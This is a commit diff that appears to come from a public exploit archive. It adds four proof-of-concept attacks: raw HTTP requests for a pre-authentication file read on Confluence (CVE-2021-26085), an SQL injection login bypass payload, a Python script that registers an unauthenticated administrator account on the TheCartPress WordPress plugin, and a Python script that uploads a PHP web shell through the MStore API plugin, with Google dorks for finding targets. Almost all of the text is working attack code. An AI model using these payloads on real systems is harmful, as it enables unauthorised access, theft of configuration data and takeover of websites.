DB: 2021-10-06

4 changes to exploits/shellcodes Student Quarterly Grading System 1.0 - SQLi Authentication Bypass Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated) Wordpress Plugin MStore API 2.0.6 - Arbitrary File Upload
2021-10-06 05:02:07 +00:00 · 2021-10-06 05:02:07 +00:00 · 44fc5e9b1a
commit 44fc5e9b1a
parent 7cf828b365
5 changed files with 224 additions and 0 deletions
--- a/exploits/java/webapps/50377.txt
+++ b/exploits/java/webapps/50377.txt
@ -0,0 +1,56 @@
+# Exploit Title: Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read
+# Date: 2021-10-05
+# Exploit Author: Mayank Deshmukh
+# Vendor Homepage: https://www.atlassian.com/
+# Software Link: https://www.atlassian.com/software/confluence/download-archives
+# Version: version < 7.4.10 and 7.5.0 ≤ version < 7.12.3
+# Tested on: Kali Linux & Windows 10
+# CVE : CVE-2021-26085
+
+POC #1 - web.xml
+
+GET /s/123cfx/_/;/WEB-INF/web.xml HTTP/1.1
+Host: 127.0.0.1:8090
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+POC #2 - seraph-config.xml
+
+GET /s/123cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1
+Host: 127.0.0.1:8090
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+POC #3 - pom.properties
+
+GET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties HTTP/1.1
+Host: 127.0.0.1:8090
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+POC #4 - pom.xml
+
+GET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml HTTP/1.1
+Host: 127.0.0.1:8090
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
--- a/exploits/php/webapps/50376.txt
+++ b/exploits/php/webapps/50376.txt
@ -0,0 +1,37 @@
+# Exploit Title: Student Quarterly Grading System 1.0 - SQLi Authentication Bypass
+# Date: 04.10.2021
+# Exploit Author: Blackhan
+# Vendor Homepage: https://www.sourcecodester.com/php/14953/student-quarterly-grading-system-using-php-and-sqlite-free-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14953&title=Student+Quarterly+Grading+System+using+PHP+and+SQLite+Database+Free+Source+Code
+# Version: 1.0
+# Tested on: Windows 10, Kali Linux
+# Student Quarterly Grading System v1.0 Login page can be bypassed with a simple SQLi to the username parameter.
+
+Steps To Reproduce:
+1 - Go to the login page http://localhost/grading_system/login.php
+2 - Enter the payload to username field as "bypass' or 1=1-- -" without double-quotes and type anything to password field.
+3 - Click on "Login" button and you are logged in as administrator.
+
+PoC
+
+POST /grading_system/Actions.php?a=login HTTP/1.1
+Host: localhost
+Content-Length: 45
+sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99"
+Accept: application/json, text/javascript, */*; q=0.01
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
+sec-ch-ua-platform: "Windows"
+Origin: http://localhost
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://localhost/grading_system/login.php
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: PHPSESSID=arkil63kkqsabj3b8cf3oimm2j
+Connection: close
+
+username=bypass'+or+1%3D1--+-&password=bypass
--- a/exploits/php/webapps/50378.py
+++ b/exploits/php/webapps/50378.py
@ -0,0 +1,65 @@
+# Exploit Title: Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)
+# Google Dork: inurl:/wp-content/plugins/thecartpress/
+# Date: 04/10/2021
+# Exploit Author: spacehen
+# Vendor Homepage: https://wordpress.org/plugin/thecartpress
+# Version: <= 1.5.3.6
+# Tested on: Ubuntu 20.04.1
+
+import os.path
+from os import path
+import json
+import requests;
+import sys
+
+def print_banner():
+	print("TheCartPress <= 1.5.3.6 - Unauthenticated Privilege Escalation")
+	print("Author -> space_hen (www.github.com/spacehen)")
+
+def print_usage():
+	print("Usage: python3 exploit.py [target url]")
+	print("Ex: python3 exploit.py https://example.com")
+
+def vuln_check(uri):
+	response = requests.get(uri)
+	raw = response.text
+	if ("User name is required" in raw):
+		return True;
+	else:
+		return False;
+
+def main():
+
+	print_banner()
+	if(len(sys.argv) != 2):
+		print_usage();
+		sys.exit(1);
+
+	base = sys.argv[1]
+
+	ajax_action = 'tcp_register_and_login_ajax'
+	admin = '/wp-admin/admin-ajax.php';
+
+	uri = base + admin + '?action=' + ajax_action ;
+	check = vuln_check(uri);
+
+	if(check == False):
+		print("(*) Target not vulnerable!");
+		sys.exit(1)
+
+	data = {
+	"tcp_new_user_name" : "admin_02",
+	"tcp_new_user_pass" : "admin1234",
+	"tcp_repeat_user_pass" : "admin1234",
+	"tcp_new_user_email" : "test@test.com",
+	"tcp_role" : "administrator"
+	}
+	print("Inserting admin...");
+	response = requests.post(uri, data=data )
+	if (response.text == "\"\""):
+		print("Success!")
+		print("Now login at /wp-admin/")
+	else:
+		print(response.text)
+
+main();
--- a/exploits/php/webapps/50379.py
+++ b/exploits/php/webapps/50379.py
@ -0,0 +1,62 @@
+# Exploit Title: Wordpress Plugin MStore API 2.0.6 - Arbitrary File Upload
+# Google Dork: inurl:/wp-content/plugins/mstore-api/
+# Date: 22/09/2021
+# Exploit Author: spacehen
+# Vendor Homepage: https://wordpress.org/plugins/mstore-api/
+# Version: 2.0.6, possibly higher
+# Tested on: Ubuntu 20.04.1
+
+import os.path
+from os import path
+import json
+import requests;
+import sys
+
+def print_banner():
+	print("MStore API < 2.0.6 - Arbitrary File Upload")
+	print("Author -> space_hen (www.github.com/spacehen)")
+
+def print_usage():
+	print("Usage: python3 exploit.py [target url] [shell path]")
+	print("Ex: python3 exploit.py https://example.com ./shell.php")
+
+def vuln_check(uri):
+	response = requests.post(uri)
+	raw = response.text
+
+	if ("Key must be" in raw):
+		return True;
+	else:
+		return False;
+
+def main():
+
+	print_banner()
+	if(len(sys.argv) != 3):
+		print_usage();
+		sys.exit(1);
+
+	base = sys.argv[1]
+	file_path = sys.argv[2]
+
+	rest_url = '/wp-json/api/flutter_woo/config_file'
+
+	uri = base + rest_url;
+	check = vuln_check(uri);
+
+	if(check == False):
+		print("(*) Target not vulnerable!");
+		sys.exit(1)
+
+	if( path.isfile(file_path) == False):
+		print("(*) Invalid file!")
+		sys.exit(1)
+
+	files = {'file' : ( "config.json.php", open(file_path), "application/json" )}
+
+	print("Uploading shell...");
+	response = requests.post(uri, files=files )
+	# response should be location of file
+	print(response.text)
+
+main();
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -44488,3 +44488,7 @@ id,file,description,date,author,type,platform,port
 50373,exploits/multiple/webapps/50373.py,"Open Game Panel - Remote Code Execution (RCE) (Authenticated)",1970-01-01,prey,webapps,multiple,
 50374,exploits/php/webapps/50374.txt,"Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Jordan Glover",webapps,php,
 50375,exploits/php/webapps/50375.txt,"Young Entrepreneur E-Negosyo System 1.0 - 'PRODESC' Stored Cross-Site Scripting (XSS)",1970-01-01,"Jordan Glover",webapps,php,
+50376,exploits/php/webapps/50376.txt,"Student Quarterly Grading System 1.0 - SQLi Authentication Bypass",1970-01-01,Blackhan,webapps,php,
+50377,exploits/java/webapps/50377.txt,"Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read",1970-01-01,"Mayank Deshmukh",webapps,java,
+50378,exploits/php/webapps/50378.py,"Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)",1970-01-01,spacehen,webapps,php,
+50379,exploits/php/webapps/50379.py,"Wordpress Plugin MStore API 2.0.6 - Arbitrary File Upload",1970-01-01,spacehen,webapps,php,